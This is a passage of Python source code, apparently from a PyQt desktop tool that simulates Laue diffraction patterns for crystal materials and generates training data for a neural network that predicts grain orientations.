hkl_all_class0 = hkl_all_class0, hkl_all_class1=hkl_all_class1,
mode_spotCycleglobal=self.mode_spotCycleglobal,
softmax_threshold_global = self.softmax_threshold_global,
mr_threshold_global = self.mr_threshold_global,
cap_matchrate = self.cap_matchrate,
coeff = self.coeff,
coeff_overlap1212 = self.coeff_overlap,
fit_peaks_gaussian_global = self.fit_peaks_gaussian_global,
FitPixelDev_global = self.FitPixelDev_global,
NumberMaxofFits = self.NumberMaxofFits,
tolerance_strain = self.tolerance_strain,
tolerance_strain1 = self.tolerance_strain1,
material0_limit = self.material0_limit,
material1_limit = self.material1_limit,
symmetry_name = self.symmetry_name,
symmetry1_name = self.symmetry1_name,
use_previous_UBmatrix_name = self.use_previous_UBmatrix,
material_phase_always_present = self.material_phase_always_present,
crystal=self.crystal, crystal1=self.crystal1,
strain_free_parameters=self.strain_free_parameters,
additional_expression=self.additional_expression)
w2.show()
self.popups.append(w2)
self.state2 += 1
def _createStatusBar(self):
self.status = QStatusBar()
self.status.showMessage("status")
self.setStatusBar(self.status)
def _formLayout(self):
self.formLayout = QFormLayout()
self.progress = QProgressBar()
self.configure_nn = QPushButton('Configure parameters')
self.configure_nn.clicked.connect(self.show_window_parameters)
self.configure_nn.setEnabled(True)
self.generate_nn = QPushButton('Generate Training dataset')
self.generate_nn.clicked.connect(self.generate_training_data)
self.generate_nn.setEnabled(False)
self.train_nn = QPushButton('Train Neural Network')
self.train_nn.clicked.connect(self.train_neural_network)
self.train_nn.setEnabled(False)
self.train_nnhp = QPushButton('Hypergrid Params OPT')
self.train_nnhp.clicked.connect(self.grid_search_hyperparams)
self.train_nnhp.setEnabled(False)
self.predict_lnn = QPushButton('Live Prediction with IPF map')
self.predict_lnn.clicked.connect(self.show_window_liveprediction)
self.predict_lnn.setEnabled(False)
self.formLayout.addRow(self.progress)
self.formLayout.addRow(self.configure_nn)
self.formLayout.addRow(self.generate_nn)
self.formLayout.addRow(self.train_nn)
self.formLayout.addRow(self.train_nnhp)
self.formLayout.addRow(self.predict_lnn)
self.layout.addLayout(self.formLayout)
def write_to_console(self, line):
try:
self.text_file_log.write(line + "\n")
except:
print("Log file not yet created: "+ str(line.encode('utf-8','ignore')))
self.setDisplayText(str(line.encode('utf-8','ignore'),errors='ignore'))
QApplication.processEvents()
def postprocesstrain(self, emit_dict):
self.input_params = {
"material_": emit_dict["material_"], ## same key as used in LaueTools
"material1_": emit_dict["material1_"],
"prefix": emit_dict["prefix"],
"symmetry": emit_dict["symmetry"],
"symmetry1": emit_dict["symmetry1"],
"hkl_max_identify" : emit_dict["hkl_max_identify"], # can be "auto" or an index i.e 12
"hkl_max_identify1" : emit_dict["hkl_max_identify1"],
"maximum_angle_to_search" : emit_dict["maximum_angle_to_search"],
"step_for_binning" : emit_dict["step_for_binning"],
"mode_of_analysis" : emit_dict["mode_of_analysis"],
"nb_grains_per_lp" : emit_dict["nb_grains_per_lp"], ## max grains to expect in a LP
"nb_grains_per_lp1" : emit_dict["nb_grains_per_lp1"],
"grains_nb_simulate" : emit_dict["grains_nb_simulate"],
"detectorparameters" : emit_dict["detectorparameters"],
"pixelsize" : emit_dict["pixelsize"],
"dim1" : emit_dict["dim1"],
"dim2" : emit_dict["dim2"],
"emin" : emit_dict["emin"],
"emax" : emit_dict["emax"],
"batch_size" : emit_dict["batch_size"], ## batches of files to use while training
"epochs" : emit_dict["epochs"], ## number of epochs for training
"texture": emit_dict["texture"],
"mode_nn": emit_dict["mode_nn"],
"grid_bool": emit_dict["grid_bool"],
"directory": emit_dict["directory"],
"freq_rmv": emit_dict["freq_rmv"],
"elements": emit_dict["elements"],
"freq_rmv1": emit_dict["freq_rmv1"],
"elements1": emit_dict["elements1"],
"include_scm": emit_dict["include_scm"],
"lr": emit_dict["lr"],
"kc": emit_dict["kc"],
"bc": emit_dict["bc"],
}
## Gray out options based on the mode_nn
if self.input_params["mode_nn"] == "Generate Data & Train":
self.write_to_console("Generate and Train the Model")
self.generate_nn.setEnabled(True)
elif self.input_params["mode_nn"] == "Train":
self.write_to_console("Data already exists ? Train the Model")
self.train_nn.setEnabled(True)
self.trialtoolbar10.setEnabled(True)
elif self.input_params["mode_nn"] == "Predict":
self.write_to_console("Model already exists? Lets Predict!")
self.write_to_console("on the fly prediction (fingers crossed)")
# self.predict_nn.setEnabled(True)
# self.predict_nnc.setEnabled(True)
self.predict_lnn.setEnabled(True)
if self.input_params["grid_bool"] == "True":
self.train_nnhp.setEnabled(True)
self.include_scm = False
if self.input_params["include_scm"] == "yes":
self.include_scm = True
self.freq_rmv = self.input_params["freq_rmv"]
self.freq_rmv1 = self.input_params["freq_rmv1"]
if self.input_params["elements"] == "all":
self.elements = self.input_params["elements"] #"all"
self.elements1 = self.input_params["elements1"] #"all"
else:
self.elements = int(self.input_params["elements"])
self.elements1 = int(self.input_params["elements1"])
self.material_ = self.input_params["material_"]
self.material1_ = self.input_params["material1_"]
self.emin, self.emax = self.input_params["emin"], self.input_params["emax"]
self.learning_rate, self.kernel_coeff, self.bias_coeff = self.input_params["lr"],self.input_params["kc"],self.input_params["bc"]
if self.input_params["directory"] == None: ## default path
if self.material_ == self.material1_:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+self.input_params["prefix"]
else:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+"_"+self.input_params["material1_"]+self.input_params["prefix"]
else:
if self.material_ == self.material1_:
self.save_directory = self.input_params["directory"]+"//"+self.input_params["material_"]+self.input_params["prefix"]
else:
self.save_directory = self.input_params["directory"]+"//"+self.input_params["material_"]+"_"+self.input_params["material1_"]+self.input_params["prefix"]
self.n = self.input_params["hkl_max_identify"]
self.n1 = self.input_params["hkl_max_identify1"]
self.maximum_angle_to_search = self.input_params["maximum_angle_to_search"]
self.step_for_binning = self.input_params["step_for_binning"]
self.mode_of_analysis = self.input_params["mode_of_analysis"]
self.nb_grains_per_lp = self.input_params["nb_grains_per_lp"]
self.nb_grains_per_lp1 = self.input_params["nb_grains_per_lp1"]
self.grains_nb_simulate = self.input_params["grains_nb_simulate"]
self.detectorparameters = self.input_params["detectorparameters"]
self.pixelsize = self.input_params["pixelsize"]
# =============================================================================
# Symmetry input
# =============================================================================
a, b, c, alpha, beta, gamma = dictLT.dict_Materials[self.material_][1]
# a, b, c = a*0.1, b*0.1, c*0.1
if self.SG == None:
if self.input_params["symmetry"] =="cubic":
self.SG = 230
elif self.input_params["symmetry"] =="monoclinic":
self.SG = 10
elif self.input_params["symmetry"] == "hexagonal":
self.SG = 191
elif self.input_params["symmetry"] == "orthorhombic":
self.SG = 47
elif self.input_params["symmetry"] == "tetragonal":
self.SG = 123
elif self.input_params["symmetry"] == "trigonal":
self.SG = 162
elif self.input_params["symmetry"] == "triclinic":
self.SG = 2
self.rules = dictLT.dict_Materials[self.material_][-1]
self.symmetry_name = self.input_params["symmetry"]
if self.input_params["symmetry"] =="cubic":
self.crystal = SGLattice(int(self.SG), a)
self.symmetry = Symmetry.cubic
self.lattice_material = Lattice.cubic(a)
elif self.input_params["symmetry"] =="monoclinic":
self.crystal = SGLattice(int(self.SG),a, b, c, beta)
self.symmetry = Symmetry.monoclinic
self.lattice_material = Lattice.monoclinic(a, b, c, beta)
elif self.input_params["symmetry"] == "hexagonal":
self.crystal = SGLattice(int(self.SG),a, c)
self.symmetry = Symmetry.hexagonal
self.lattice_material = Lattice.hexagonal(a, c)
elif self.input_params["symmetry"] == "orthorhombic":
self.crystal = SGLattice(int(self.SG),a, b, c)
self.symmetry = Symmetry.orthorhombic
self.lattice_material = Lattice.orthorhombic(a, b, c)
elif self.input_params["symmetry"] == "tetragonal":
self.crystal = SGLattice(int(self.SG),a, c)
self.symmetry = Symmetry.tetragonal
self.lattice_material = Lattice.tetragonal(a, c)
elif self.input_params["symmetry"] == "trigonal":
self.crystal = SGLattice(int(self.SG),a, alpha)
self.symmetry = Symmetry.trigonal
self.lattice_material = Lattice.rhombohedral(a, alpha)
elif self.input_params["symmetry"] == "triclinic":
self.crystal = SGLattice(int(self.SG),a, b, c, alpha, beta, gamma)
self.symmetry = Symmetry.triclinic
self.lattice_material = Lattice.triclinic(a, b, c, alpha, beta, gamma)
# self.symmetry.operation_rotation = self.crystal._hklsym
# self.lattice_material.sglattice = self.crystal
if self.material_ != self.material1_:
if self.SG1 == None:
if self.input_params["symmetry1"] =="cubic":
self.SG1 = 230
elif self.input_params["symmetry1"] =="monoclinic":
self.SG1 = 10
elif self.input_params["symmetry1"] == "hexagonal":
self.SG1 = 191
elif self.input_params["symmetry1"] == "orthorhombic":
self.SG1 = 47
elif self.input_params["symmetry1"] == "tetragonal":
self.SG1 = 123
elif self.input_params["symmetry1"] == "trigonal":
self.SG1 = 162
elif self.input_params["symmetry1"] == "triclinic":
self.SG1 = 2
self.symmetry1_name = self.input_params["symmetry1"]
a1, b1, c1, alpha1, beta1, gamma1 = dictLT.dict_Materials[self.material1_][1]
self.rules1 = dictLT.dict_Materials[self.material1_][-1]
if self.input_params["symmetry1"] =="cubic":
self.crystal1 = SGLattice(int(self.SG1), a1)
self.symmetry1 = Symmetry.cubic
self.lattice_material1 = Lattice.cubic(a1)
elif self.input_params["symmetry1"] =="monoclinic":
self.crystal1 = SGLattice(int(self.SG1),a1, b1, c1, beta1)
self.symmetry1 = Symmetry.monoclinic
self.lattice_material1 = Lattice.monoclinic(a1, b1, c1, beta1)
elif self.input_params["symmetry1"] == "hexagonal":
self.crystal1 = SGLattice(int(self.SG1),a1, c1)
self.symmetry1 = Symmetry.hexagonal
self.lattice_material1 = Lattice.hexagonal(a1, c1)
elif self.input_params["symmetry1"] == "orthorhombic":
self.crystal1 = SGLattice(int(self.SG1),a1, b1, c1)
self.symmetry1 = Symmetry.orthorhombic
self.lattice_material1 = Lattice.orthorhombic(a1, b1, c1)
elif self.input_params["symmetry1"] == "tetragonal":
self.crystal1 = SGLattice(int(self.SG1),a1, c1)
self.symmetry1 = Symmetry.tetragonal
self.lattice_material1 = Lattice.tetragonal(a1, c1)
elif self.input_params["symmetry1"] == "trigonal":
self.crystal1 = SGLattice(int(self.SG1),a1, alpha1)
self.symmetry1 = Symmetry.trigonal
self.lattice_material1 = Lattice.rhombohedral(a1, alpha1)
elif self.input_params["symmetry1"] == "triclinic":
self.crystal1 = SGLattice(int(self.SG1),a1, b1, c1, alpha1, beta1, gamma1)
self.symmetry1 = Symmetry.triclinic
self.lattice_material1 = Lattice.triclinic(a1, b1, c1, alpha1, beta1, gamma1)
# self.symmetry1.operation_rotation = self.crystal1._hklsym
# self.lattice_material1.sglattice = self.crystal1
else:
self.rules1 = None
self.symmetry1 = None
self.lattice_material1 = None
self.crystal1 = None
self.symmetry1_name = self.input_params["symmetry"]
self.modelp = "random"
### Load texture files based on symmetry
if self.input_params["texture"] == "in-built_Uniform_Distribution":
self.write_to_console("Using uniform distribution generated with Neper for Training dataset \n")
self.modelp = "uniform"
elif self.input_params["texture"] == "random":
self.write_to_console("Using random orientation distribution for Training dataset \n")
self.modelp = "random"
else:
self.modelp = "experimental"
self.write_to_console("# User defined texture to be used: TODO \n")
try:
if not os.path.exists(self.save_directory):
os.makedirs(self.save_directory)
except:
if self.material_ == self.material1_:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+self.input_params["prefix"]
else:
self.save_directory = os.getcwd()+"//"+self.input_params["material_"]+"_"+self.input_params["material1_"]+self.input_params["prefix"]
if not os.path.exists(self.save_directory):
os.makedirs(self.save_directory)
self.write_to_console("Working directory :"+ self.save_directory)
## Golbal log file
now = datetime.datetime.fromtimestamp(GUI_START_TIME)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
if self.material_ == self.material1_:
self.text_file_log = open(self.save_directory+"//log_"+self.material_+".txt", "a")
else:
self.text_file_log = open(self.save_directory+"//log_"+self.material_+"_"+self.material1_+".txt", "a")
self.text_file_log.write("# Log file created at "+ c_time + "\n")
def temp_HKL(self, removeharmonics=1):
material_= self.input_params["material_"]
nbgrains = self.input_params["nb_grains_per_lp"]
nbtestspots = 0
hkl_sol_all = np.zeros((1,4))
verbose=0
for _ in range(10):
seednumber = np.random.randint(1e6)
tabledistancerandom, hkl_sol, \
_, _, _, _, _ = self.prepare_LP(nbgrains, 0,
material_,
None,
verbose,
plotLauePattern=False,
seed=seednumber,
detectorparameters=self.input_params["detectorparameters"],
pixelsize=self.input_params["pixelsize"],
dim1=self.input_params["dim1"],
dim2=self.input_params["dim2"],
removeharmonics=removeharmonics)
spots_in_center = [sp for sp in range(len(tabledistancerandom))] # take all spots in Laue pattern
hkl_sol_all = np.vstack((hkl_sol_all, hkl_sol))
nbtestspots = nbtestspots + len(spots_in_center)
if self.material_ != self.material1_:
copy1 = np.copy(int(np.max(np.abs(hkl_sol_all))))
copy1_min = np.copy(int(np.min(hkl_sol_all)))
material_= self.input_params["material1_"]
nbgrains = self.input_params["nb_grains_per_lp1"]
hkl_sol_all = np.zeros((1,4))
verbose=0
for _ in range(10):
seednumber = np.random.randint(1e6)
tabledistancerandom, hkl_sol, \
_, _, _, _, _ = self.prepare_LP(nbgrains, 0,
material_,
None,
verbose,
plotLauePattern=False,
seed=seednumber,
detectorparameters=self.input_params["detectorparameters"],
pixelsize=self.input_params["pixelsize"],
dim1=self.input_params["dim1"],
dim2=self.input_params["dim2"],
removeharmonics=removeharmonics)
spots_in_center = [sp for sp in range(len(tabledistancerandom))] # take all spots in Laue pattern
hkl_sol_all = np.vstack((hkl_sol_all, hkl_sol))
nbtestspots = nbtestspots + len(spots_in_center)
hkl_sol_all = np.delete(hkl_sol_all, 0, axis =0)
copy_ = np.copy(int(np.max(np.abs(hkl_sol_all))))
copy_min_ = np.copy(int(np.min(hkl_sol_all)))
self.write_to_console("Total spots created for calculating HKL bounds:"+str(nbtestspots))
self.write_to_console("Max HKL index for "+self.material_+" :"+str(copy1))
self.write_to_console("Min HKL index "+self.material_+" :"+str(copy1_min))
self.write_to_console("Max HKL index for "+self.material1_+" :"+str(copy_))
self.write_to_console("Min HKL index "+self.material1_+" :"+str(copy_min_))
return int(copy1), int(copy_)
self.write_to_console("Total spots created for calculating HKL bounds:"+str(nbtestspots))
self.write_to_console("Max HKL index:"+str(np.max(hkl_sol_all)))
self.write_to_console("Min HKL index:"+str(np.min(hkl_sol_all)))
return int(np.max(np.abs(hkl_sol_all))), int(np.max(np.abs(hkl_sol_all)))
def prepare_LP(self, nbgrains, nbgrains1, material_, material1_, verbose, plotLauePattern, seed=None, sortintensity=False,
detectorparameters=None, pixelsize=None, dim1=2048, dim2=2048, removeharmonics=1):
s_tth, s_chi, s_miller_ind, s_posx, s_posy, \
s_intensity, _, _ = simulatemultiplepatterns(nbgrains, nbgrains1, seed=seed,
key_material=material_,
key_material1=material1_,
detectorparameters=detectorparameters,
pixelsize=pixelsize,
emin=self.emin,
emax=self.emax,
sortintensity=sortintensity,
dim1=dim1,dim2=dim2,
removeharmonics=removeharmonics,
misorientation_angle=1,
phase_always_present=None)
# considering all spots
allspots_the_chi = np.transpose(np.array([s_tth/2., s_chi]))
tabledistancerandom = np.transpose(GT.calculdist_from_thetachi(allspots_the_chi, allspots_the_chi))
# ground truth
hkl_sol = s_miller_ind
return tabledistancerandom, hkl_sol, s_posx, s_posy, s_intensity, s_tth, s_chi
def load_dataset(self, material_="Cu", material1_="Cu", ang_maxx=18.,step=0.1, mode=0,
nb_grains=1, nb_grains1=1, grains_nb_simulate=100, data_realism = False,
detectorparameters=None, pixelsize=None, type_="training",
var0 = 0, dim1=2048, dim2=2048, removeharmonics=1):
"""
works for all symmetries now.
"""
## make sure directory exists
save_directory_ = self.save_directory+"//"+type_
if not os.path.exists(save_directory_):
os.makedirs(save_directory_)
try:
with open(self.save_directory+"//classhkl_data_"+material_+".pickle", "rb") as input_file:
classhkl, _, _, n, _, \
hkl_all_class, _, lattice_material, symmetry = cPickle.load(input_file)
max_millerindex = int(n)
max_millerindex1 = int(n)
if material_ != material1_:
with open(self.save_directory+"//classhkl_data_"+material1_+".pickle", "rb") as input_file:
classhkl1, _, _, n1, _, \
hkl_all_class1, _, lattice_material1, symmetry1 = cPickle.load(input_file)
max_millerindex1 = int(n1)
except:
self.write_to_console("Class HKL library data not found, please run it first")
return None
if var0==1:
codebars, angbins = get_material_data(material_ = material_, ang_maxx = ang_maxx, step = step,
hkl_ref=n, classhkl=classhkl)
loc = np.array([ij for ij in range(len(classhkl))])
self.write_to_console("Verifying if two different HKL class have same angular distribution (can be very time consuming depending on the symmetry)")
index = []
self.progress.setMaximum(len(codebars))
list_appended = []
count_cbs = 0
for i, j in enumerate(codebars):
for k, l in enumerate(codebars):
# if i in list_appended and k in list_appended:
# continue
if i != k and np.all(j == l):
index.append((i,k))
string0 = "HKL's "+ str(classhkl[i])+" and "+str(classhkl[k])+" have exactly the same angular distribution."
self.write_to_console(string0)
list_appended.append(i)
list_appended.append(k)
count_cbs += 1
self.progress.setValue(count_cbs)
QApplication.processEvents()
if len(index) == 0:
self.write_to_console("Great! No two HKL class have same angular distribution")
#np.savez_compressed(save_directory_+'//grain_init.npz', codebars, loc)
else:
self.write_to_console("Some HKL's have similar angular distribution; this will likely reduce the accuracy of the neural network; verify if symmetry matrix and other parameters are properly configured; this is just for the dictionary; keep eye on the dataset being generated for training")
self.write_to_console("This is likely the result of the symmetry operation available in a user_defined space group; this shouldn't affect the general accuracy of the model")
np.savez_compressed(self.save_directory+'//conflict_angular_distribution_debug.npz', codebars, index)
np.savez_compressed(self.save_directory+'//grain_classhkl_angbin.npz', classhkl, angbins)
if material_ != material1_:
codebars, angbins = get_material_data(material_ = material1_, ang_maxx = ang_maxx, step = step,
hkl_ref=n1, classhkl=classhkl1)
ind_offset = loc[-1] + 1
loc = np.array([ind_offset + ij for ij in range(len(classhkl1))])
self.write_to_console("Verifying if two different HKL class have same angular distribution (can be very time consuming depending on the symmetry)")
index = []
self.progress.setMaximum(len(codebars))
list_appended = []
count_cbs = 0
for i, j in enumerate(codebars):
for k, l in enumerate(codebars):
# if i in list_appended and k in list_appended:
# continue
if i != k and np.all(j == l):
index.append((i,k))
string0 = "HKL's "+ str(classhkl1[i])+" and "+str(classhkl1[k])+" have exactly the same angular distribution."
self.write_to_console(string0)
list_appended.append(i)
list_appended.append(k)
count_cbs += 1
self.progress.setValue(count_cbs)
QApplication.processEvents()
if len(index) == 0:
self.write_to_console("Great! No two HKL class have same angular distribution")
#np.savez_compressed(save_directory_+'//grain_init1.npz', codebars, loc)
else:
self.write_to_console("Some HKL's have similar angular distribution; this will likely reduce the accuracy of the neural network; verify if symmetry matrix and other parameters are properly configured; this is just for the dictionary; keep eye on the dataset being generated for training")
self.write_to_console("This is likely the result of the symmetry operation available in a user_defined space group; this shouldn't affect the general accuracy of the model")
np.savez_compressed(self.save_directory+'//conflict_angular_distribution1_debug.npz', codebars, index)
np.savez_compressed(self.save_directory+'//grain_classhkl_angbin1.npz', classhkl1, angbins)
## make comprehensive list of dictionary
normal_hkl_ = np.zeros((1,3))
for j in hkl_all_class.keys():
normal_hkl_ = np.vstack((normal_hkl_, hkl_all_class[j]["family"]))
normal_hkl = np.delete(normal_hkl_, 0, axis =0)
if material_ != material1_:
normal_hkl1_ = np.zeros((1,3))
for j in hkl_all_class1.keys():
normal_hkl1_ = np.vstack((normal_hkl1_, hkl_all_class1[j]["family"]))
normal_hkl1 = np.delete(normal_hkl1_, 0, axis =0)
index_hkl = [j for j,k in enumerate(hkl_all_class.keys()) for i in range(len(hkl_all_class[k]["family"]))]
if material_ != material1_:
ind_offset = index_hkl[-1] + 1
index_hkl1 = [ind_offset+j for j,k in enumerate(hkl_all_class1.keys()) for i in range(len(hkl_all_class1[k]["family"]))]
if material_ == material1_:
index_hkl1 = None
normal_hkl1 = None
classhkl1 = None
hkl_all_class1 = None
lattice_material1 = None
symmetry1 = None
self.write_to_console("Generating "+type_+" and saving them")
if material_ != material1_:
nb_grains_list = list(range(nb_grains+1))
nb_grains1_list = list(range(nb_grains1+1))
list_permute = list(itertools.product(nb_grains_list, nb_grains1_list))
list_permute.pop(0)
max_progress = len(list_permute)*grains_nb_simulate
if self.matrix_phase_always_present != None and type_ != "testing_data":
dummy_, key_material_new = self.matrix_phase_always_present.split(';')
if key_material_new == material_:
max_progress = len(list_permute)*grains_nb_simulate + (len(nb_grains1_list)-1)*grains_nb_simulate
else:
max_progress = len(list_permute)*grains_nb_simulate + (len(nb_grains_list)-1)*grains_nb_simulate
else:
max_progress = nb_grains*grains_nb_simulate
if self.matrix_phase_always_present != None and type_ != "testing_data":
max_progress = nb_grains*grains_nb_simulate*2
if self.include_scm:
max_progress = max_progress + grains_nb_simulate
if material_ != material1_:
max_progress = max_progress + 2*grains_nb_simulate
self.progress.setMaximum(max_progress)
self._inputs_queue = Queue()
self._outputs_queue = Queue()
self._worker_process = {}
for i in range(self.ncpu):
self._worker_process[i]= Process(target=worker_generation, args=(self._inputs_queue,
self._outputs_queue,
i+1),)
for i in range(self.ncpu):
self._worker_process[i].start()
time.sleep(0.1)
if material_ != material1_:
if self.modelp == "uniform":
if type_ =="training_data":
xlim, ylim = 0, int(0.8*2000)
else:
xlim, ylim = int(0.8*2000), 2000-1
path_array = resource_path("uniform_orientations_2000.npz")
arr = np.load(path_array)
if symmetry == symmetry.cubic:
odf_data = arr["arr_6"][xlim:ylim]
# print("Laue group 11")
elif symmetry == symmetry.hexagonal:
odf_data = arr["arr_5"][xlim:ylim]
# print("Laue group 9")
elif symmetry == symmetry.trigonal:
odf_data = arr["arr_4"][xlim:ylim]
# print("Laue group 7")
elif symmetry == symmetry.tetragonal:
odf_data = arr["arr_3"][xlim:ylim]
# print("Laue group 5")
elif symmetry == symmetry.orthorhombic:
odf_data = arr["arr_2"][xlim:ylim]
# print("Laue group 3")
elif symmetry == symmetry.monoclinic:
odf_data = arr["arr_1"][xlim:ylim]
# print("Laue group 2")
elif symmetry == symmetry.triclinic:
odf_data = arr["arr_0"][xlim:ylim]
# print("Laue group 1")
if symmetry1 == symmetry.cubic:
odf_data1 = arr["arr_6"][xlim:ylim]
# print("Laue group 11")
elif symmetry1 == symmetry.hexagonal:
odf_data1 = arr["arr_5"][xlim:ylim]
# print("Laue group 9")
elif symmetry1 == symmetry.trigonal:
odf_data1 = arr["arr_4"][xlim:ylim]
# print("Laue group 7")
elif symmetry1 == symmetry.tetragonal:
odf_data1 = arr["arr_3"][xlim:ylim]
# print("Laue group 5")
elif symmetry1 == symmetry.orthorhombic:
odf_data1 = arr["arr_2"][xlim:ylim]
# print("Laue group 3")
elif symmetry1 == symmetry.monoclinic:
odf_data1 = arr["arr_1"][xlim:ylim]
# print("Laue group 2")
elif symmetry1 == symmetry.triclinic:
odf_data1 = arr["arr_0"][xlim:ylim]
# print("Laue group 1")
## list of combination of training dataset
## to be seen if this improves the prediction quality
## increases time significantly to generate the data
nb_grains_list = list(range(nb_grains+1))
nb_grains1_list = list(range(nb_grains1+1))
list_permute = list(itertools.product(nb_grains_list, nb_grains1_list))
list_permute.pop(0) ## removing the 0,0 index
# Idea 2 Or generate a database upto n grain LP
values = []
for i in range(len(list_permute)):
ii, jj = list_permute[i]
for j in range(grains_nb_simulate):
if data_realism:
## three types of data augmentation to mimic reality ?
if j < grains_nb_simulate*0.25:
noisy_data = False
remove_peaks = False
elif (j >= grains_nb_simulate*0.25) and (j < grains_nb_simulate*0.5):
noisy_data = True
remove_peaks = False
elif (j >= grains_nb_simulate*0.5) and (j < grains_nb_simulate*0.75):
noisy_data = False
remove_peaks = True
elif (j >= grains_nb_simulate*0.75):
noisy_data = True
remove_peaks = True
else:
noisy_data = False
remove_peaks = False
if self.modelp == "uniform":
rand_choice = np.random.choice(len(odf_data), ii, replace=False)
rand_choice1 = np.random.choice(len(odf_data1), jj, replace=False)
data_odf_data = odf_data[rand_choice,:,:]
data_odf_data1 = odf_data1[rand_choice1,:,:]
else:
data_odf_data = None
data_odf_data1 = None
seednumber = np.random.randint(1e6)
values.append([ii, jj, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
if self.matrix_phase_always_present != None and \
type_ != "testing_data":
dummy_, key_material_new = self.matrix_phase_always_present.split(';')
if key_material_new == material_ and ii == 0:
values.append([0, jj, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
self.matrix_phase_always_present])
elif key_material_new == material1_ and jj == 0:
values.append([ii, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
self.matrix_phase_always_present])
chunks = chunker_list(values, self.ncpu)
chunks_mp = list(chunks)
if self.include_scm:
meta = {'t1':time.time(),
'flag':0}
else:
meta = {'t1':time.time(),
'flag':1}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
else:
# Idea 2 Or generate a database upto n grain LP
if self.modelp == "uniform":
## training split
if type_ =="training_data":
xlim, ylim = 0, int(0.8*2000)
else:
xlim, ylim = int(0.8*2000), 2000-1
path_array = resource_path("uniform_orientations_2000.npz")
arr = np.load(path_array)
if symmetry == symmetry.cubic:
odf_data = arr["arr_6"][xlim:ylim]
print("Laue group 11")
elif symmetry == symmetry.hexagonal:
odf_data = arr["arr_5"][xlim:ylim]
print("Laue group 9")
elif symmetry == symmetry.trigonal:
odf_data = arr["arr_4"][xlim:ylim]
print("Laue group 7")
elif symmetry == symmetry.tetragonal:
odf_data = arr["arr_3"][xlim:ylim]
print("Laue group 5")
elif symmetry == symmetry.orthorhombic:
odf_data = arr["arr_2"][xlim:ylim]
print("Laue group 3")
elif symmetry == symmetry.monoclinic:
odf_data = arr["arr_1"][xlim:ylim]
print("Laue group 2")
elif symmetry == symmetry.triclinic:
odf_data = arr["arr_0"][xlim:ylim]
print("Laue group 1")
values = []
for i in range(nb_grains):
for j in range(grains_nb_simulate):
if data_realism:
## three types of data augmentation to mimic reality ?
if j < grains_nb_simulate*0.25:
noisy_data = False
remove_peaks = False
elif (j >= grains_nb_simulate*0.25) and (j < grains_nb_simulate*0.5):
noisy_data = True
remove_peaks = False
elif (j >= grains_nb_simulate*0.5) and (j < grains_nb_simulate*0.75):
noisy_data = False
remove_peaks = True
elif (j >= grains_nb_simulate*0.75):
noisy_data = True
remove_peaks = True
else:
noisy_data = False
remove_peaks = False
if self.modelp == "uniform":
rand_choice = np.random.choice(len(odf_data), i+1, replace=False)
data_odf_data = odf_data[rand_choice,:,:]
data_odf_data1 = None
else:
data_odf_data = None
data_odf_data1 = None
seednumber = np.random.randint(1e6)
values.append([i+1, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
if self.matrix_phase_always_present != None and \
type_ != "testing_data":
values.append([i+1, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
0, i, j, save_directory_,
data_odf_data,
data_odf_data1,
self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
self.matrix_phase_always_present])
chunks = chunker_list(values, self.ncpu)
chunks_mp = list(chunks)
if self.include_scm:
meta = {'t1':time.time(),
'flag':0}
else:
meta = {'t1':time.time(),
'flag':1}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
if self.include_scm:
self.write_to_console("Generating small angle misorientation single crystals")
values = []
for i in range(grains_nb_simulate):
if data_realism:
## three types of data augmentation to mimic reality ?
if i < grains_nb_simulate*0.25:
noisy_data = False
remove_peaks = False
elif (i >= grains_nb_simulate*0.25) and (i < grains_nb_simulate*0.5):
noisy_data = True
remove_peaks = False
elif (i >= grains_nb_simulate*0.5) and (i < grains_nb_simulate*0.75):
noisy_data = False
remove_peaks = True
elif (i >= grains_nb_simulate*0.75):
noisy_data = True
remove_peaks = True
else:
